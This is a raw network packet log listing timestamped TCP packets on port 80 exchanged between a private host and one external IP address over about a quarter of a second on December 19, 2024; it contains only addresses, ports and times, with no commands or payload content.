Dec 19, 2024 10:10:20.775509119 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.776034117 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.776083946 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.776161909 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.776205063 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.776814938 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.776859999 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.777051926 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.777096987 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.777709961 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.777756929 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.777764082 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.777806044 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.778491020 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.778541088 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.778589964 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.778634071 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.779202938 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.779252052 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.779284954 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.779325008 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.779980898 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.780026913 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.780035019 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.780081987 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.780612946 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.780658960 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.780826092 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.780869961 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.781538963 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.781583071 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.781646967 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.781691074 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.782428026 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.782474041 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.782552958 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.782598019 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.783444881 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.783493042 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.783502102 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.783540964 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.784368992 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.784415960 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.784450054 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.784496069 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.785245895 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.785290956 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.785423994 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.785470009 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.786283016 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.786345005 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.786382914 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.786425114 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.787081003 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.787131071 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.787170887 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.787214041 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.787997961 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.788060904 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.788212061 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.788258076 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.789071083 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.789118052 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.789180994 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.789227962 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.789936066 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.789988041 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.790052891 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.790096045 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.790854931 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.790900946 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.790980101 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.791023016 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.791896105 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.791938066 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.792010069 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.792053938 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.792819977 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.792865038 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.792936087 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.792975903 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.793778896 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.793821096 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.793899059 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.793941975 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.794817924 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.794872046 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.794996977 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.795039892 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.795986891 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.796035051 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.796169996 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.796216965 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.797091961 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.797152042 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.797343969 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.797388077 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.798188925 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.798352957 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.798384905 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.798399925 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.799302101 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.799349070 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.799459934 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.799504042 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.800282001 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.800328970 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.800440073 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.800484896 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.801153898 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.801201105 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.801264048 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.801311970 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.802251101 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.802295923 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.802355051 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.802392006 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.803364038 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.803412914 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.803417921 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.803461075 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.804174900 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.804229021 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.804438114 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.804487944 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.804878950 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.804928064 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.805067062 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.805110931 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.805789948 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.805840969 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.805917025 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.805960894 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.806746960 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.806782007 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.806793928 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.806824923 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.807346106 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.807393074 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.807399988 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.807442904 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.808267117 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.808303118 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.808307886 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.808351994 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.808923960 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.808969975 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.954786062 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.954814911 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.954849005 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.954982996 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.954983950 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.955163956 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.955332041 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.955786943 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.955830097 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.955842018 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.955883980 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.956269026 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.956311941 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.956450939 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.956491947 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.956979036 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.957022905 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.957153082 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.957194090 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.957793951 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.957842112 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.957843065 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.957885027 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.958658934 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.958714962 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.958775043 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.958817959 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.959526062 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.959578991 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.959660053 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.959712029 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.960321903 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.960371971 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.960376024 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.960423946 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.961332083 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.961384058 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.961396933 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.961442947 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.962238073 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.962292910 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.962356091 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.962408066 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.963104010 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.963160038 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.963237047 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.963284016 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.963891983 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.963946104 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.964025974 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.964073896 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.964519978 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.964575052 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.964576960 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.964621067 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.965298891 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.965357065 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.965466976 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.965519905 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.966320992 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.966377020 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.966455936 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.966505051 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.967540979 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.967600107 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.967654943 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.967703104 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.968569040 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.968606949 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.968625069 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.968652010 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.969552040 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.969598055 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.969644070 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.969690084 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.970643044 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.970690966 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.970752954 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.970796108 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.971653938 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.971698999 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.971739054 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.971786976 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.972733021 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.972781897 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.972781897 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.972827911 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.973759890 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.973803043 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.973890066 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.973931074 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.974560022 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.974603891 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.974653959 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.974704981 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.975199938 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.975245953 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.975385904 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.975431919 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.975892067 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.975939989 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.976022959 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.976068020 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.976814032 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.976865053 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.976943016 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.976986885 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.977740049 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.977777958 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.977797031 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.977828979 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.978801012 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.978926897 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.978985071 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.979736090 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.979794025 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.979989052 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.980047941 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.980536938 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.980590105 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.980710983 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.980756044 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.981328011 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.981394053 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.981468916 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.981518030 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.982125044 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.982172966 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.982224941 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.982271910 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.983027935 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.983077049 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.983083010 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.983122110 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.983867884 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.983916044 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.983943939 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.983988047 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.984618902 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.984666109 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.984846115 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.984893084 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.985452890 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.985497952 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.985578060 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.985624075 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.986319065 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.986366987 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.986479044 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.986527920 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.987354040 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.987396955 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.987426043 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.987481117 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.988147020 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.988195896 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.988212109 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.988256931 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.988732100 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.988779068 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.988791943 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.988837004 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.989520073 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.989566088 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.989610910 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.989655972 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.990335941 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.990389109 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.990427971 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.990473032 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.991121054 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.991168022 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.991214991 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.991262913 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.991832972 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.991887093 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.991888046 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.991938114 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.992610931 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.992660046 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.992773056 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.992820024 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.993227959 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.993264914 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.993275881 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.993319035 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.994031906 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.994086027 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.994119883 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.994167089 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.994828939 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.994875908 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.994916916 CET	80	49881	185.215.113.16	192.168.2.6
